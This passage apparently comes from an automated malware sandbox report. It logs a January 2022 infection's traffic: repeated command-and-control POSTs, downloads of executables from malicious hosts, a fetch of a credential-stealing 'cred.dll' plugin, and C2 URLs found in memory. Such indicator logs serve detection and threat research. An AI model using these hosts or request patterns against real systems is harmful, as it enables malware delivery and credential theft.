                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqkgjg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qfojwny.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jypmxggbe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bopkt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rcosdqvkc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vpvuvi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xchjuwapl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcgcly.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xhcmjwqukh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tbwkdtvra.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unlkmoivsp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://buyqsohhho.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmtmt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://guadmgqcy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aaxrubcof.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uswhy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqmqnwq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ulfdnrx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vyvnhyowq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mpjbq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://smapchtl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jeacjnamm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://awifxkoma.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aoummij.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://omefw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bgprljhr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lptdnkjgh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: host-data-coin-11.com
Source: global traffic | TCP traffic: 192.168.2.4:49797 -> 185.7.214.171:8080
Source: global traffic | TCP traffic: 192.168.2.4:49882 -> 86.107.197.138:38133
Source: unknown | Network traffic detected: IP country count 10
Source: global traffic | TCP traffic: 192.168.2.4:49844 -> 40.93.207.0:25
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp | String found in binary or memory: http://178.62.113.205/capibar
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp | String found in binary or memory: http://178.62.113.205/capibard
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp | String found in binary or memory: http://185.163.204.22/capibar
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp | String found in binary or memory: http://185.163.204.22/capibarp
Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.1044509910.000000000520A000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24/
Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/71fe7726da53cb25be1ef5cfcccec20e728d94fe
Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c0335
Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c03351
Source: 5C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24/22
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp | String found in binary or memory: http://185.163.45.70/capibar
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp | String found in binary or memory: http://185.163.45.70/capibarvg
Source: WerFault.exe, 0000000F.00000003.800924790.0000000004DB9000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.804189922.0000000004DB9000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.825450760.000001C021700000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000001C.00000002.825450760.000001C021700000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmp | String found in binary or memory: http://help.disneyplus.com.
Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp | String found in binary or memory: https://185.163.204.22/capibar
Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: F65C.exe, 00000012.00000002.825741767.0000000003F01000.00000004.00000001.sdmp, F65C.exe, 00000023.00000000.820336133.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.ip.sb/ip
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp | String found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmp | String found in binary or memory: https://disneyplus.com/legal.
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 5C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp | String found in binary or memory: https://t.me/capibar
Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp | String found in binary or memory: https://telegram.org/img/t_logo.png
Source: svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: 5C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/gws_rd=ssl
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: svchost.exe, 0000001C.00000003.802948696.000001C02178F000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.802872605.000001C0217A6000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.803050058.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.802727525.000001C0217A6000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.802640576.000001C021759000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown | DNS traffic detected: queries for: host-data-coin-11.com
Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_00404BE0 GetProcessHeap, RtlAllocateHeap, InternetOpenA, InternetSetOptionA, StrCmpCA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, InternetConnectA, InternetConnectA, HttpOpenRequestA, HttpOpenRequestA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrlen, lstrlen, GetProcessHeap, RtlAllocateHeap, lstrlen, memcpy, lstrlen, memcpy, lstrlen, lstrlen, memcpy, lstrlen, HttpSendRequestA, HttpQueryInfoA, StrCmpCA, Sleep, InternetReadFile, lstrcat, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /9.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: a0621298.xsph.ru
Source: global traffic | HTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1 | Host: 185.215.113.35
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /capibar HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: 185.163.204.22
Source: global traffic | HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /capibar HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: 185.163.204.22
Source: global traffic | HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/71fe7726da53cb25be1ef5cfcccec20e728d94fe HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
Source: global traffic | HTTP traffic detected: GET /7.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: a0621298.xsph.ru
Source: global traffic | HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c0335 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
Source: unknown | Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown | Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown | Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49888
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 08:24:58 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1a b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 19{i+,GO0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 08:24:59 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 08:25:00 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 08:25:00 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 